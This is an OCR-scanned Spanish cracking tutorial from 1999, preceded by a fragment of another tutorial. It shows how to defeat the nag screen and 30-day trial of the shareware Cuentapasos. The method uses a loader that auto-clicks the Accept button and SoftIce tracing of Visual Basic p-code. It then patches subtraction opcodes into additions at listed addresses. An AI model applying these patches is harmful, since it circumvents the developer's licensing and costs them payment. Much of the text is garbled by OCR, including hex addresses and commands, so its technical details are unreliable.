Los registros y las posiciones de memoria que tu te vas a encontrar seran diferentes , pero la rutina sera bastante 
parecida. Para ver nuestro numero de serie valido nos situamos en la linea del PUSH 0047B52B y escribimos en el 
Softlce "d 0047B52B" 

Para terminar nada mejor que practicar con la obra maestra de algun programador desinformado. (Se nota que pocos 
programadores leen nuestros tutoriales jejeje, en fin, peor para ellos, el que no aprende es porque no quiere). 


Como obtener un Serial Valido para Talisman v1.1 


====== kk PERSONAL GREETZ 4 *-========¿4% 


Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Tornftdo, 

JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


* * 


|WHISKEY KON TEKILA| 
|Mr.WhiTe [WkT!99] | 
|http://wkt.tsx.org| 
|[http://ecd.tsx.org| 


* * 
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Cracker Mr. Blue 
Fecha 18 de Octubre de 1999 


Introducción 


Quién no haya intentado crackear este clásico, o alguna de sus versiones predecesoras, que me 
tire la primera piedra... 


Todos hemos oído hablar del Cuentapasos que, a pesar de existir otros programas equivalentes 
de distribución gratuita, sigue siendo una codiciada presa. Nos encontramos ante una 
aplicación escrita en Visual Basic, en la que el autor ha intentado protegerla por todos lados, 
tapando entradas y huecos, cerrándonos puertas de formas más o menos inteligentes. Y 
sabemos que cuanto más interés pone el autor en proteger una aplicación, más interesante hace 
a la presa, desde el punto de vista didáctico que es el que nos mueve a los miembros de WKT!. 


Sirva el presente tutorial para demostrar la gran dificultad que supone para cualquier 
programador realizar una protección eficiente de sus aplicaciones cuando estas están escritas en 
Visual Basic. La nueva forma de compilación en p-code no hace más que facilitar las cosas a 
los amantes de la ingeniería inversa. De hecho, durante el tutorial se mostrará que desproteger 
un programa de Visual Basic p-compilado es mucho más sencillo e inmediato que el mismo 
compilado en código nativo. 


Aprenderemos, además de cómo pelearnos con éxito contra el p-code, otras técnicas exóticas. 
Reconozco que podría haberse hecho de otra forma menos elaborada, pero nuestra meta no es 
crackear; es aprender, enseñar y mostrar nuevas técnicas crackeando. 


Reconocimiento y exploración 


Veamos a que nos enfrentamos. Al ejecutar el programa, nos aparece una pantalla de 
bienvenida, en la que posteriormente aparece que es una versión de evaluación. Sobre esta 
pantalla aparece otra que nos muestra los datos de la aplicación, dirección de correo electrónico 
del autor, etc... También aparece un código de compra, tanto en el título como en el botón de la 
derecha. 


Lo que nos interesa es que aparecen los días transcurridos del periodo de evaluación y los días 
que nos restan que no es más que treinta menos los días transcurridos. Además aparecen dos 
botones, Aceptar y Salir. Estos serán nuestros enemigos, la nag-screen y las rutinas que 
calculan los días restantes de evaluación. Nuestros objetivos serán que el usuario no se vea 
obligado a pulsar Aceptar para arrancar la aplicación (es irritante) y por supuesto, "ampliar" el 
periodo de evaluación (que alguien puede pensar que es insuficiente). 


Es una buena costumbre, para empezar a tomar contacto con el programa, y sobre todo en esta 
fase inicial en la que tenemos que planear nuestra estrategia, pasar a la víctima por un detector 
de formatos como el GetTyp. La salida del GetTyp nos muestra que el ejecutable se encuentra 
comprimido. Más explicaciones en el tutorial de Mr.Orange sobre descompresión manual con 
ProcDump. Al encontrarse comprimido, no podremos realizar un parcheador que actúe sobre el 
fichero en disco, tendremos que descomprimirlo previamente. 


El ratón virtual 


Para saltar la nagscreen vamos a utilizar un método clásico, que muchos pueden desconocer. 
Vamos a simular un click del ratón sobre el botón Aceptar, sin intervención del usuario. Es un 
método en desuso pero elegante y limpio, que nos permite comprender un poco mejor el 
funcionamiento del Windows y aprender muchas cosas, que es para lo que estamos aquí. 


¿Cómo se hace? Lo primero que debemos hacer es obtener el identificador del proceso del cual 
queremos depende el botón que queremos pulsar. Esto puede hacerse de dos maneras, o 
ejecutamos nosotros el proceso vícitma mediante CreateProcess o nos enganchamos al proceso 
que ya está en ejecución. Lógicamente, lo que a nosotros nos interesa es lo primero, para lo que 
crearemos un cargador del programa que será el que cargue a la aplicación víctima, esperará a 
que se cargue y buscará una referencia o handle de la ventana en la que se encuentra el botón 
que queremos pulsar. Después, buscaremos en esa ventana el botón que nos interesa y 
finalmente simularemos un click sobre él. 


Para buscar la ventana se utiliza la función EnumThreadWindows. Esta función sirve para 
enumerar todas las ventanas padre asociadas al thread que le pasamos como parámetro. Para 
ello, utiliza una función de tipo Callback que no es más que una función escrita por nosotros, 
que es ejecutada por EnumThreadWindows cada vez que encuentra una ventana. 
EnumThreadWindows le pasa a nuestra función de Callback el puntero a la ventana que ha 
encontrado.Nuestra función , a su salida, devolverá un booleano: False si ya se ha encontrado la 
ventana o True en caso contrario. EnumThreadWindows no devolverá el control a nuestro 


cargador hasta que la función de Callback haya devuelto un False o bien se hayan enumerado 
ya todas las ventanas. 


¿Y cómo sabemos si una ventana es la que buscamos o no? Para eso, nuestra función de 
Callback puede utilizar varias funciones: 


e GetClassName. Devuleve el nombre de la clase de la ventana que le pasamos como 
parámetro. 

e GetWindowText. Devuelve el texto o título de la ventana. 

e GetWindowRect. Devuelve las coordenadas de la esquina superior izquierda y esquina 
inferior derecha de la ventana. 


Una vez que hayamos encontrado la ventana que contiene el botón que queremos pulsar, 
debemos encontrar un puntero a este botón. En este caso, la función es EnumChildWindows, a la 
que le pasamos el puntero a una ventana padre, y nos enumera todas la ventanas hijas de ella 
(botones, cuadros de texto,...). Su funcionamiento es idéntico al de EnumThread Windows. 


Ya tenemos el botón, ahora, a pulsarlo. Esto se realiza mediante PostMessage, que manda a la 
ventana que queramos, el mensaje que queramos. En este caso, enviaremos a un botón el 
mensaje BM_CLICK, que simula pulsar y soltar el botón del ratón. 


Más información y ejemplos sobre este tema en las páginas de Fravia, en la sección '+HCU's 
Papers": Simulating User Input to Eliminate Nag Screens por bb. 


¡ Atrapen a ese botón ! ¡ Atrapenlo ! 


Botones al borde de un ataque de nervios 


Antes de nada tenemos que recabar información sobre el botón que queremos "pulsar". 
Volvemos a arrancar el Cuentapasos pero dejamos sin pulsar el botón Aceptar. Arrancamos el 
Spy++ (o similar) para que nos muestre los parámetros de los componentes de la nagscreen, en 
especial los nombres de clase de los objetos de interes, el texto que aparece y las coordenadas. 
Pulsamos en la opción 'Find' (Alt+FF3) y pasamos el punto de mira por todos los componentes de 
Interés. 


Por si no os habeis dado cuenta todavía, de ejecución en ejecución, los botones Aceptar y Salir 
se intercambian de manera aleatoria. Así, el autor evita una de las posibles formas de 
distinguirlos, mediante su situación en pantalla que nos da la función GetWindowkRect. 


Tanto la nagscreen como la ventana de presentación son de la clase ThunderRT5Form, para 
poderlas distinguir nos tendremos que fijar en el título, ya que la pantalla de presentación no 
tiene título y la nagscreen tiene '"Versión de Evaluación P...'. Por lo que parece, no vamos a 
tener problemas para encontrar la ventana padre de nuestro botón. 


Vamos a los botones. Podemos olvidarnos del botón ''Comprar «Programa P...”, ya que es 
facilmente identificable por tamaño, situación y texto. Tanto el botón Aceptar como Salir, 
tienen exactamente el mismo tamaño, evitando así el autor del programa que podamos 
distinguirlos mediante la función GetWindowRect que también permite conocer el tamaño de 
una ventana. Los dos son de la clase ThunderRT5CommandButton (tampoco podremos 
distinguirlos por el nombre de la clase), y el texto... oh, oh. Ninguno de los dos tienen texto, así 
que tampoco nos sirve GetWindowText. Y algunos se preguntarán, "Entonces ¿Aceptar y Salir 
qué son?" Pues está claro, si no son cadenas de texto serán ... imágenes. Para probarlo, cambiad 
el color de las ventanas de Windows y veréis que, aunque el botón cambia de color, las palabras 
Aceptar y Salir están enmarcadas por el fondo gris que trae por defecto el Windows. Como 
podeis ver, el autor ha obrado inteligentemente y se ha informado convenientemente sobre 
técnicas de ingeniería inversa (a lo mejor hasta nos lee a nosotros). 


Bien, no nos pongamos nerviosos. Tenemos dos botones que al parecer, cambian de sitio de 
manera aleatoria pero ... el orden de creación de los botones siempre será el mismo, 
independientemente de donde se situen. Si excarvamos más profundamente en la ayuda de la 
APT nos encontramos la función GetNextWindow, que dado el puntero a una ventana hija, nos 
da el puntero a la ventana hija siguiente o a la posterior. Ya tan solo queda por descubrir que 
posición ocupa el botón Aceptar en el orden de creación. De hecho, la función 
EnumChildWindows enumera las ventanas hijas en el orden de creación, bastaría con coger, por 
ejemplo, la cuarta ventana que nos enumere suponiendo que el botón Aceptar sea la cuarta. 


Bueno, vamos a ver. Volvemos al Spy++ con esperanzas renovadas y pulsamos las propiedades 
del botón Aceptar de la nagscreen. En mi caso es el botón de la izquierda y es el último que 
aparece en la lista, si pinchamos en la etiqueta '"Windows' de la ventana de propiedades del 
botón podemos recorrenos sus predecesores, y al ser el último, no tiene sucesores. Veamos si 
esto es cierto cuando Aceptar cambia de sitio. Cerramos el Cuentapasos y lo ejecutamos hasta 
que el botón Aceptar sea el del centro. Volvemos a ir al Spy++ y el botón Aceptar..... joderl, 


¿mM 


ahora es el penúltimo. Será "joío". Parece que el autor se ha informado "demasiado bien”. 


Esto significa, que los botones no cambian de sitio, lo que cambia es la funcionalidad de cada 
uno de ellos, y la imagen que tienen incrustrada. No podemos distinguirlos por la posición, ni 
por el tamaño, ni por el texto, ni por la clase, .... 


Soluciones 


e Registrarnos. :-( 

e Aplicar la solución propuesta por bb en Simulating User Input to Eliminate Nag 
Screens. 

e "Amarrar" a ese travieso botoncito en un sitio fijo. 


La solución propuesta por bb, para el WinZip (un problema idéntico al nuestro) es utilizar la 
función GetPixel para poder distinguir qué imagen tiene cada botón. Para unas coordenadas 
dadas, esta función devuelve el color del pixel correspondiente. Conocemos las coordenadas de 
los dos botones, tan solo nos queda buscar un pixel en de los botones Aceptar y Salir que sean 
disitntos. Esto, con cualquier programa gráfico esta "chupao". Sería la solución ideal, ya que 
siempre debemos intentar modificar los menos posible el ejecutable de nuestra víctima. 


Como somos más chulos que un ocho, y lo que queremos es mostrar la facilidades que nos 
ofrece Visual Basic, vamos a "pegar" el botón Aceptar a un sitio fijo, para posteriormente, 
ametrallarlo a placer con PostMessage. Para hacer esto, tendremos que bucear en el código con 
ayuda del Softlce y del SmartCheck, y, lógicamente, cambiar algunas "cosillas" en las rutinas 


que deciden dónde se pone cada botón. Descubriremos la impactante sensación de "no me 
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entero de ná" que se experimenta inicialmente al sumergirnos en el p-code. Agarraros al ratón 
que el viaje va a ser movidito. 


P-Code: Descenso a los infiernos de Micro$oft 


Número aleatorios 


Antes de entrar en faena, es casi obligado leerse el fantástico tutorial de Esiel2, CRACKEANDO EN VISUAL BASIC. 


Aprenderéis todo lo básico para para crackear programas de Visual Basic, y cómo configurar nuestras herramientas 
adecuadamente para sacarles el máximo partido al atacar programas escritos en este lenguaje. 


Tal y como hacemos siempre que tenemos una pieza realizada en Visual Basic, recurrimos al alucinante SmartCheck. 
Arrancamos el SmartCheck, cargamos el programa y, lo primero que nos aparece, a modo de advertencia es lo siguiente: 


cpasos32.exe 1s compiled to p-code...etc... 


Se podría decir que los amigos de NuMega nos quieren advertir que bajo esas condiciones, nuestra ya esacasa salud mental 
puede correr peligro. Tenemos la oportunidad de arrepentirnos, como en toda aplicación de Windows que se precie, pero 
"semos” valientes y elegimos continuar. 


Inicialmente no vamos a necesitar las llamadas a la APL por lo que podemos habilitar la opción de suprimir las llamadas a la 
API. Ejecutamos el Cuentapasos desde el SmartCheck, habilitando desde el principio la captura de eventos, y nos acomodamos 
en la silla, para ver pasar la película. Cuando aparezca la nagscreen, nos fijamos que posición ocupa el botón Aceptar y 
pulsamos Salir . Como vamos a intentar localizar donde pueden estar las rutinas que deciden donde se situa cada botón con 
llegar a la nagscreen tenemos de sobra. 


Nos vamos a la zona en la que se carga la nagscreen, al final. Buscamos el evento frmRegistro_Load: 


15240 Ehe lbláceptoCondiciones. Caption <-- "Entiendo que puedo utilizar CuentaPasos para uso exclusivo de e" [String]l 

15241 Eh lbláceptoCondiciones.FontBold <-- False [Boolean] 

15242 he emdComoRegistrarse. Caption <-- "Comprar Programa P501092-1032-49" (String) 
23% And returns double:0,9741839 [displayed as sinale-precision floating point) 

15244 Ea imgácepto.Picture 

15245 Ene cmdáceptar(0]. Picture <-- ptr:DO52E634 (WT_PTR] 

15246 Ehe emdáceptar(0)MWéhatsThisHelplD <-- 26025 (Long) 

15247 Ea imgSalir. Picture 

15248 he emdáceptar(1). Picture <-- ptr.D0052E590 (WT_PTR] 

15249 he cmdáceptar(1] Cancel <-- True [Boolean] 

15250 Ehe cmdáceptar(1]WhatsThisHelplD <-- 26030 (Long) 


15251 ¿£ fimRegistro_Load 
15252 “>  fimRegistro.Show 
15295 9% Now 

15296 $% Month 

15297 -S  fimSplash.Hide 


Como puede verse, lo último que hace la aplicación al cargar la nagscreen es inicializar las propiedades de los botones. En esta 
ocasión, el botón Aceptar me ha salido a la izquierda, por lo que tus resultados serán distintos si te ha salido en el centro. Así, en 
el evento 15242, se asigna la propiedad Caption del botón que muestra la ayuda de como registrarse. A partir del evento 15244, 
se asignan las propiedades a otros dos botones que no pueden ser otros que lo que a nosotros nos traen de cabeza. Se cargan las 
imágenes 'imgAcepto' y 'imgSalir', y se asignan a la propiedad Picture de cada uno de los botones. Al botón 'emdAceptar(1)' se 
le activa la propiedad Cancel. Si desempolvamos la ayuda de Visual Basic, encontramos que si esta propiedad es TRUE, la tecla 
ESC activará al botón. Si volvemos a cargar el Cuentapasos (sin el SmartCheck) y pulsamos ESC en la nagscreen, la aplicación 
termina. Esto significa que en este caso el botón 'cmdAceptar(1)' está funcionando como Salir. Conclusión, 'emdAceptar(0)' es el 
botón de la izquierda y el otro el del centro. Esto podemos probarlo ejecutando varias veces el Cuentapasos, y viendo como al 
cambiar Aceptar al centro, la propiedad Cancel se la activa a 'emdAceptar(0). 


Veis lo que hay en el evento 15243. Justo después de inicializar el botón de Comprar y justo antes de los de Aceptar y Salir, se 
genera un número aleatorio mediante la función Rnd(). Por su delatadora situación, creo que todos apostaríamos el brazo a que 
la decisión de dónde se colocan los botones, tiene mucho que ver con el numerito obtenido. Si nos las amañamos para que dicho 
numerito tenga siempre un valor fijo, el botón Aceptar se quedará fijo. 


Vemos desde donde se invoca la función Rnd(), ¿desde "MSVBVMS50.DLL!000FE7BD"? Arrea, ¿qué es esto?. Comenzamos a 
mirar el resto de funciones y TODAS se ejecutan desde las direcciones OFE7BD y OFE7ED de MSVBVMS5O0.DLL, exceptuando 
aquellas que tengan que ver con objetos visuales (forms, botones,...) 


¿Se nos vuelve loco el SmartCheck con programas p-compilados? 


La puerta del sótano 


Vamos a ver si el Softlce nos aclara algo. Lo primero que debemos hacer, como con todos los programas de Visual Basic, es 
cargar los símbolos de las librerías de VB. En este caso, como nos lo ha "chivado" el SmartCheck, es la librería 
MSVBVMS50.DLL. Lo de "MSVBVM" debe ser algo así como MicroSoft Visual Basic Virtual Machine, o máquina virtual de 
Visual Basic (toda una máquina de torturas, ya vereis...) 


Consultamos cuál de las funciones que exporta, puede ser Rnd(). Tenéis un listado de todas las funciones que se exportan en el 
tutorial de Mr.Brown para VB5. Nos saltan a los ojos dos de ellas: 


Addr:0F004A95 Ord: 593 (0251h) Name: rtcRandomNext 
Addr :0F0O3AE08 Ord: 594 (0252h) Name: rtcRandomize 


Visual Basic dispone de dos funciones para generar números aleatorios: 


e Randomize. Se utiliza para inicializar el generador de números aletorios. El Cuentapasos la utiliza, por ejemplo, al 
inicio del frmRegistro_Load. 
e Rnd(). Devuelve un número aleatorio entre O y 1. 


La función Rnd() se corresponderá con la rtcRandomNext exportada por la DII. Lo primero que debemos ver es el número de 
veces que el Cuentapasos llama a la función Rnd() antes de la llamada que nos interesa. Nos colocamos en el SmartCheck y 
buscamos las llamadas a Rnd(). Se producen dos llamadas, la nuestra es la segunda. 


Bajada a los infiernos 


Nos vamos al Softlce, y colocamos un bpx rtcRandomNext. Volvemos al Windows y ejecutamos el Cuentapasos. Vemos como 
se carga el splash y ... BOOM... salta el Softlce. Como la que nos interesa es la segunda llamada, pulsamos Ctrl+D y enseguida 
vuelve a saltar el punto de ruptura. No nos importa que es lo que hace la función rtcRandomNext para generar el número 
aleatorio, solo nos interesa saber que es lo que el Cuentapasos se propone hacer con él. Pulsamos F11 y salimos justo destrás del 
call que llamó a la función, en la dirección OFOFE7COH de la DII del VB. 


La función Rnd() devuelve un número entre cero y uno, por lo que debe devolverlo en los registros de punto flotante. Para ver el 
contenido de esos registros desde Softlce escribimos wf. Efectivamente, el número aleatorio generado se encuentra en el registro 
STO. 


Empezamos a ejecutar paso a paso pulsando F8, y en seguida encontramos algo interesante: 


OFOFE7CC mov al, [esi] 
OFOFE7CE inc esi 
OFOFE7CF jmp ds: [eax*4+0FO0FED94] 


Cargamos en AL el contenido de la dirección apuntada por ESI (0F4h), incrementamos ESI y saltamos a una dirección que 
depende de lo que hemos leído con ESI. Si vemos a dónde esta apuntado ESL, descubriremos que está apuntando al código de 
nuestro querido Cuentapasos. 


Tras el salto, aterrizamos en OFOFDE15. Seguimos pulsando F8 y vemos como se carga en la pila un byte de valor OAh que está 
en el código del Cuentapasos (siempre apuntado por ESI). Nuevamente, uno de los bytes del código del ejecutable (OEBh) es 
utilizado para efectuar un salto exactamente igual que antes, al contenido de la dirección OEBh*4+0F0FED94=0FOFF140 


Esta vez vamos a parar a OFOFD3ES, en donde el OAh cargado anteriormente en la pila es volcado en el registro STO, 
desplazando el número aleatorio al ST1. Se elimina el OAh de la pila y se vuelve a realizar otro salto igual que el anterior. 


Caemos en OFOFDFCB. Vamos a parar un momento a ver si nos aclaramos la cabeza antes de que cometamos una locura con el 
monitor y la silla ... 


Una luz al final del pasillo... 


Nos desplazamos por la ventana de código y le echamos una mirada a los alrededores de donde estamos situados. Nos 
encontramos porciones de código de 5-10 instrucciones, todas terminadas por el mismo código que cité antes; carga de un byte 
apuntado por ESI en AL, incremento ESI y salto al contenido de la dirección calculada como EAX*44+0FOFED94h. 


Vamos a echarle un vistazo a esa especie de tabla de direcciones que parecen usar todas las porciones de código al terminar para 
proseguir con la ejecución. Miremos, por ejemplo, en la dirección OFOFF140h, que se cálculo al final de la parte de código que 
cargo el OAh del código del Cuentapasos en la pila. Encontramos en dicha dirección, OFOFDSES5h, que es la dirección de la 
porción de código en la que se carga el contenido de la pila en STO. Las direcciones que se encuentran alrededor, apuntan 
igualmente a porciones de código que al finalizar, vuelven a recurrir a esta tabla para ver a donde saltan. 


Del infierno al cielo 


Dicho en otras palabras, el ejecutable (cpasos32.exe) nunca es ejecutado. Su código es leído e interpretado completamente por la 
DIl. Por lo tanto, todas y cada una de las instrucciones en ensamblador que conocemos, tendrán que tener una porción de 
código en la DI] que las sustituya. 


Volvamos al inicio, a la dirección OFOFE7CCH, justo después de volver de la función Rnd(). Allí, cargamos del ejecutable un 
byte, OF4h, que nos hizo saltar a una dirección en la que se cargo el siguiente byte del ejecutable, OAh, en la pila. Por tanto, 
nuestro "push OAh" del ensamblador que en código máquina se codifica como "6A OA”, en p-code es "F4 OA". El F4h será 
interpretado como "introducir el siguiente byte en la pila" por la tabla situada en OFOFED9Ah, al ejecutarse con la DII. 


No es más que la filosofía de Visual Basic, en la que las funciones más generales no se implementan en los ejecutables, si no en 
unas librerías comunes a todas las aplicaciones de VB, pero llevada a sus últimas consecuencias. No solo se implementan en las 
librerías las funciones más usuales si no que además se meten TODAS las instrucciones que puede ejecutar la aplicación. 


Algunos pensarán, "Pues bien, es tan solo una especie de traducción rara que lo que hace es complicar las cosas. Es un lenguaje 
completamente interpretado. ¿Dónde está esa ventaja del p-code?". Si alguien no lo ve claro ahora, cuando ataquemos a las 
rutinas de cálculo del periodo restante de evaluación, se le abrirán los ojos. 


Clavando un botón 


Recordamos por donde íbamos. Se había generado un número aleatorio entre O y 1 que almacenamos en el registro STO. 
Posteriormente, cargamos un OAh del código del Cuentapasos en el registro STO, desplazando el número aleatorio a STI. 


Nos situamos en OFOFDFCB, en donde multiplicamos el contenido de los registros STO y ST1 almacenando el resultado en STO. 
Nuevo acceso a la tabla de interpretación y aparecemos en OFOFDSBS, en donde el contenido del registro STO es redondeado al 
entero más cercano y volcado a la pila. Se almacenan los flags FPU (que son como los flags de toda la vida pero exclusivos de 
los registros de coma flotante) en el registro EAX. 


Una nueva visita a la tabla y saltamos a OFOFDE28h para cargar un valor de 4 bytes del ejecutable (2) en la pila. En este caso es 
un "push" de una doble palabra, no de un byte. Otro paseo por la tabla y caemos en OFOFE013. Recuperamos de la pila el 2 
anterior en ECX, y lo que volcamos anteriormente del registro STO en EAX. Dividimos este último por el 2, almacenándose el 
cociente en EAX y el resto en EDX. Se vuelca el resto a la pila y nos disponemos a saltar a otro sitio. 


Del número aleatorio generado, tan solo nos queda el valor volcado a la pila. Al haberse dividido por dos, este valor será0 o 1. 
La aplicación decidirá las posiciones de los botones según este valor. Nos hemos quedado con el resto de la división: 


round(x*10) / 2 
donde 'x' es el número aleatorio generado, entre cero y uno. 


Pulsamos Ctrl+D para ejecutar completamente el Cuentapasos. Los que tuvierais como resto de la división un cero, ¿a qué tenéis 
el botón Aceptar a la izquierda? ¿A que los que lo tenéis en centro, el resto os daba uno? 


Podemos probar nuestra teoría tanto con el SmartCheck como con el Softlce (más rápido). Ejecutamos varias veces el 
Cuentapasos, capturando el valor aleatorio devuelto. Calculamos metalmente cual sería el resto y vemos si se corresponde con la 
ubicación del botón Aceptar. 


Todavía podemos ir más lejos. ¿Cómo influye el resto de la división en la elección de qué hace un botón y qué hace el otro? Si 
recordamos lo que vimos con el SmartCheck, 'cmdAceptar' es un array de dos botones. 'cmdAceptar(0) es el botón de la 
izquierda y 'cmdAceptar(1) el del centro. Lo que la aplicación parece hacer, es asignar la función de Aceptar a 


'emdAceptar(resto)' y Salir a 'cmdAceptar(resto xor 1). 


Vamos a inmovilizar el puto botoncito de los.... . Tenemos que obligar a que el resto de la división tome siempre el mismo valor, 
cero o uno, independientemente del número aleatorio generado. Se nos pueden ocurrir dos formas: 


e Cambiar las instrucciones. Después del ejercicio que acabamos de hacer, conocemos los códigos que corresponden a 
varias instrucciones (push, división, multiplicación,..).Así, por ejemplo, podríamos sustituir las instrucciones que 
multiplican, redondean y almacenan en pila el aleatorio generado por un "push 00000002" o un "push 00000001", que 
ya sabemos como se codifican en p-code. Así, en lugar de meter en la pila el aleatorio multiplicado por 10 y 
redondeado, meteríamos un entero fijo. Debemos tener la precaución de que el número de bytes de la instrucción falsa, 
sobreescriba completamente las instrucciones a las que sustituye, por que todavía no conocemos como es el "nop" ;-) 

e Cambiar los operandos. Está es la solución más fácil y segura. 


¿Qué operandos podemos cambiar? Pues tenemos el OAh (de la multiplicación) y el 0000002 (de la división). ¿Formas de 
obligar a que el resto de la división tome un valor fijo? Por lo menos dos: 


e Multiplicar el aleatorio por cero en lugar de diez. Resto de la división cero, Aceptar siempre a la izquierda. 
e Dividir por uno en lugar de dos. Resto de la división cero, Aceptar siempre a la izquierda. 


Si hemos descomprimido el ejecutable, podemos ir realizando los parches sobre disco para ir comprobando que efectivamente 
funcionan. Repetimos los pasos anteriores para ir anotando las direcciones en memoria en las que se encuentra el operando que 
deseamos cambiar, las cadenas que deberemos buscar para localizar estos operandos en el ejecutable descomprimido con un 
editor hexadecimal, etc.. Ya sabeis como se hace esto, ¿verdad? 


Reventamos el P-Code 


Ahora, nos olvidamos del Cuentapasos, del SoftlIce, de la vecinita esa que está tan buena.... y 
nos concentramos en lo que hemos descubierto sobre el p-code. 


Para enfrentarse contra programas en Visual Basic normales, muchos habréis leído tutoriales 
información sobre funciones clave de Visual Basic que en un momento dado nos pueden ser 
muy útiles. En casi todos, se recomienda la función __vbastrcomp, utilizada por Visual Basic 
para comparar cadenas de texto. Así, en programas en donde debes introducir una clave de 
registro alfanumérica, la aplicación, en algún sitio, deberá comparar la cadena introducida con 
la que la aplicación considera correcta. 


En programas escritos en otros lenguajes no interpretados, la rutina de comparación de las 
cadenas se incluye en el ejecutable. Sabemos que está ahí, pero no sabemos dónde. En Visual 
Basic, esa función es una de las que no se incluyen en el ejecutable, si no que se encuentra en 
las librerías compartidas con el resto de aplicaciones de VB. En el caso de __ vbastrcomp, nos 
basta con colocar un punto de ruptura en esta función. Como puede ser llamada muchas veces, 
podemos limitar el punto de ruptura a que la cadena a comparar sea la que introducimos. 


La facilidad de desproteger los programas en Visual Basic, radica en esta compartición de 
funciones, que nos permite conocer, para algunas tareas específicas, donde colocar nuestro 
punto de ruptura. 


En el caso del p-code, siguen utilizándose estas rutinas compartidas, pero la novedad es que 


ahora, no solo se comparten una serie limitada de funciones, sino que todas las instrucciones 
que puede ejecutar un programa se han portado a una serie de pequeñas "funciones" en las 
librerías del VB. Examinando la librería del VB, podremos identificar gran cantidad de 
instrucciones, algunas muy importantes. 


El Cuentapasos me permitirá ilustrar la importancia de este hecho con más claridad. 


30-6 =36 


Nos centramos en el cálculo de los días que nos restan para acabar el periodo de evaluación. La 
nagscreen y el 'acerca de...' del Cuentapasos nos muestran los días transcurridos y los días que 
nos restan. 


Ahora bien, ¿me puede decir alguien cómo puede cualquier aplicación (no solo el Cuentapasos), 
sabiendo los días transcurridos y el número de días máximo (30), calcular los días que nos 


Llegados a este punto algunos pensareis que Mr.Blue está completamente "grillao". La 
respuesta es clara, restando. La resta, en ensamblador, se realiza mediante la instrucción "SUB". 
¿Y cómo se hace en p-code? Pues como hemos visto, tiene que exisitir una porción de código en 
MSVBVMS50.DLL que se utilice para hacer la resta. ¿Vais cogiendo la onda...? ¿Sentís el 
cosquilleo por la espalda ....? 


Si localizamos dónde se encuentra esa porción de código, podemos colocar un punto de ruptura 
en ella. Puesto que cualquier programa realiza un montón de restas, tendremos que limitar este 
punto de ruptura a que los operandos tomen el valor que nos interesa. En el caso de los periodos 
de evaluación, limitaremos a que el operando del que se sustrae, tenga como valor el número de 
días de evaluación, o el número máximo de ejecuciones, o... Las posibilidades son enormes. 


¿Y dóde está esa función? Para encontrarla, podemos seguir traceando el programa, tarde o 
temprano hará una resta. O también podemos, si tenemos el VB, generarnos un p-code que haga 
restas, sumas y todas las funciones que queramos descubrir. No tenemos más que pasarlo por el 
Softlce. 


La resta nos la encontramos en OFOFDF78h, y el resto de funciones aritméticas se encuentran a 
su alrededor. Encontramos multiplicaciones de enteros, de flotantes, operaciones lógicas,... todo 
un surtido. 


La función de resta de enteros, al igual que la de suma de enteros que está más arriba, se 
encuentran para operadores de 16 bits y para operadores de 32 bits. Si queremos colocar puntos 
de ruptura, los tendremos que colocar por duplicado: 


O0FOFDF78 pop eax 

OFOFDF79 sub [esp], eax 
OFOFDF7C jo OFOFDACA 

0FOFDF82 xor eax, eax 

O0FOFDF84 mov al, [esi] 

0FOFDF86 inc esi 

O0FOFDF87 jmp ds: [eax*4+0F0FED94] 


Esta función, saca un operador de la pila y se lo resta al que queda en la misma. El resultado 
queda almacenado en la pila, saltando a OFOFDACAR en caso de overflow (EAX>(ESP)). 


En mi Cuentapasos, los días transcurridos son seis así que coloco un punto de ruptura en 
OFOFDF79 de la forma bpx OFOFDF79 if (*(esp)==1E) (eax==6). 


Lo colocamos también en la versión de 16 bits, por si las moscas: bpx OFOFDF62 if 
(* (esp) ==1E) € (ax==6). 


Pulsamos Ctrl+D, ejecutamos el Cuentapasos y aparecemos en OFOFDF79. Efectivamente, la 
aplicación está intentando hacer 30-6. Examinamos a donde apunta ESI. A la dirección 
4ADFA48h, del ejecutable del Cuentapasos. En realidad, ESI está ya apuntando a la siguiente 
instrucción a ejecutar (hace las veces de EIP). La instrucción que nos trajo aquí es el byte 
'OAER' de 4ADF47h. 


Aquí, al igual que en el caso anterior podemos cambiar dos cosas: 


e Los operandos. Para cambiarlos tendríamos que retroceder, poner un punto de ruptura 
antes y ver de donde saca el Cuentapasos los valores de los operandos. Para ello, lo 
mejor es colocar un punto de ruptura de acceso a memoria en direcciones anteriores a 
4ADF47h (nuestros antiguos bpx, se convierten en bpm's). Después traceamos y vamos 
viendo con atención de donde van saliendo los operandos (ingeniería inversa hacia 
atrás). 

e La instrucción. Podemos cambiar la resta por otra instrucción, o mejor, por una suma ;- 


) 


¿Como hacemos esto? ¿Cuál es el código de la suma? Veamos, el código de la resta (32 bits) 
como hemos visto es OAEh. La función de suma, nos la encontramos algo más arriba, en 
OFOFDF3DH. Para saber su código, nos vamos a la tabla de OFOFED94h. El puntero a la función 
resta, debe encontrarse en: 


4*0AEh + OFOFED94h = OFOFF04Ch 


Nos vamos allí, y efectivamente encontramos la dirección de la función resta de 32 bits. Vamos 
a ver donde está el puntero a la suma, no debe estar muy lejos. La encontramos cuatro palabras 
más arriba, en OFOFFO3Ch. El código de la suma será por tanto: 


(OFOFFO3Ch - OFOFED94h) / 4 =0AAh 


El crack consitirá en sustituir en aquellos lugares en donde se realice la resta, 30-6 (6 en mi 
caso), el código de la operación resta (DAERh) por el de la suma (OAAh). 


Pulsamos Ctrl+D y vuelve a saltar enseguida el Softlce. En esta ocasión, el culpable es el OVAEh 
situado en 4ADFA9h. Lo anotamos y volvemos a pulsar Ctrl+D. Nos aparece la nagscreen. 
Vamos a por el 'acerca de...”. Pulsamos Aceptar y abrimos el 'acerca de...' .. otra vez nos salta el 
Softlce, otro código de resta en 04A4716h. Anotamos y Ctrl+D... otro más en 04A4769h. Este 
es el último. 


Repetimos la prueba, pero ahora, en el primer punto de ruptura, sustituímos los bytes OAEHh de 
4ADF47h, 4ADFAJ9h, 4A4716h y 4A4769h por DAAh. Realizar un cargador que, además de 
pulsar el botón de la nagscreen tal y como se ha explicado, realice los parches en memoria 
necesarios es sencillo. Tenéis un ejemplo en otro tutorial de Esiel2, que casualmente versa sobre 
el antecesor del actual Cuentapasos. 


Quitamos los puntos de ruptura, para probar, Ctrl+D y ...... 


Leda ;-) p-code rulezzz!! 


Conclusiones. 


